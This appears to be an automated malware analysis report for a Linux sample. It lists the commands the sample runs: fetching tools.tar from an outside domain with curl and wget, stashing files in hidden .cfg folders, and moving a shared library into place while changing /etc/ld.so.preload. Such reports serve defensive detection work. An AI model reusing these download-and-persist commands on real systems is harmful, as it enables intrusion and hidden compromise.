Technical Information
Malicious functions:
Performs process tracing:
- <SAMPLE>
Launches processes:
- curl -O ccbbmm.com/tools.tar
- pgrep -c rcu_tasked
- mkdir -p /usr/bin/mslog/.cfg/
- /usr/bin/dpkg --print-foreign-architectures
- mv player /usr/bin/
- tar xvf tools.tar
- chmod 777 /root/.cfg/rcu_tasked
- <SAMPLE_FULL_PATH> -c exec \x27<SAMPLE_FULL_PATH>\x27 \x22$@\x22 <SAMPLE_FULL_PATH>
- mv libextrasshd.so /usr/local/lib/
- wget ccbbmm.com/tools.tar
- <0x7b>
- mkdir -p /root/.cfg
- apt install wget -y
- chmod +x *
- cp -a /root/.cfg/dealer /usr/bin/mslog/.cfg/
- rm -rf /usr/bin/mslog/.cfg/pass*
- cp -a /root/.cfg/tools.tar /usr/bin/mslog/.cfg/
- cp -f /usr/bin/mslog/.cfg/* /root/.cfg/
- cp -a /root/.cfg/rcu_tasked /usr/bin/mslog/.cfg/
- apt install curl -y
- sleep 1
Kills the following processes:
- <SAMPLE>
Performs operations with the file system:
Modifies file access rights:
- /var/cache/apt/archives/partial
- /var/lib/apt/lists/auxfiles
Modifies file owner:
- /var/cache/apt/archives/partial
- /var/lib/apt/lists/auxfiles
Creates folders:
- /root/.cfg
- /usr/bin/mslog
- /usr/bin/mslog/.cfg
Creates or modifies files:
- /etc/ld.so.preload
- /etc/resolv.conf
- /tmp/#130834 (deleted)
- /var/lib/dpkg/lock-frontend
- /var/lib/dpkg/lock
- /var/cache/apt/archives/lock
Network activity:
Establishes connection:
- 8.#.8.8:53
DNS ASK:
- cc##mm.com
Other:
Collects OS information
Collects CPU information